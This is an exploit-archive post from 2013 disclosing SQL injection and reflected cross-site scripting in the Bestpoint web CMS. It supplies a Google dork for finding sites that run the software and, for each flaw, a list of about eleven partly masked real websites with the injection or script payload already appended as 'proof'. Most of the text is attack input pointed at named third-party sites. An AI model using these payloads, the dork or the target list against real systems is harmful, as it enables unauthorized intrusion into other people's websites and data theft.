Home / exploitsPDF  

Bestpoint Multiple Vulnerabilites

Posted on 06 September 2013

#********************************************************************************
# Exploit Title : Bestpoint Multiple Vulnerabilites
#
# Software link : http://www.bestpoint.nl
#
# Exploit Author : Ashiyane Digital Security Team
#
# Tested on: Windows 7 , Linux
#
# Google Dork :  intext:"Powered by Bestpoint"
#
# Date: 2013/09/06
#
--------------------------------------------------------------------
# Exploit 1 : Sql Injection
#
# Location : [Target]/Default.asp/id,1[Sql Injection]
#
#
# Proof:
#
# http://www.altaXXleski.nl/Default.asp/id,1'
#
# http://www.avXXc.nl/Default.asp/id,1'
#
# http://www.chXXXo.nl/Default.asp/id,1'
#
# http://www.jaXXXland.com/Default.asp/id,1'
#
# http://www.cloudbXXXpvault.net/Default.asp/id,1'
#
# http://www.icecXXXugs.com/Default.asp/id,1'
#
# http://www.sXXXXo.nl/Default.asp/id,1'
#
# http://www.vaXXXofsport.nl/Default.asp/id,1'
#
# http://www.sporXijzen.com/Default.asp/id,1'
#
# http://www.pneuXXix.com/Default.asp/id,1'
#
# http://www.wakeboXXXrdworld.eu/Default.asp/id,1'
--------------------------------------------------------------------
# Exploit 2 : Cross site scripting
#
# Location : [Target]/linkout.asp?to=[xss]
#
#
# Proof:
#
# http://www.altaXXableski.nl/linkout.asp?to=<script>alert(1);</script>
#
# http://www.avXXXXc.nl/linkout.asp?to=<script>alert(1);</script>
#
# http://www.chrXXX.nl/linkout.asp?to=<script>alert(1);</script>
#
# http://www.jannXXXland.com/linkout.asp?to=<script>alert(1);</script>
#
# http://www.cloudbacXXvault.net/linkout.asp?to=<script>alert(1);</script>
#
# http://www.icecreammXXs.com/linkout.asp?to=<script>alert(1);</script>
#
# http://www.seXuro.nl/linkout.asp?to=<script>alert(1);</script>
#
# http://www.vanXXfsport.nl/linkout.asp?to=<script>alert(1);</script>
#
# http://www.sporXXprijzen.com/linkout.asp?to=<script>alert(1);</script>
#
# http://www.pneXXix.com/linkout.asp?to=<script>alert(1);</script>
#
# http://www.wakXXoardworld.eu/linkout.asp?to=<script>alert(1);</script>
#
######################
discovered by : ACC3SS
######################

 

TOP

Malware :

Exploits :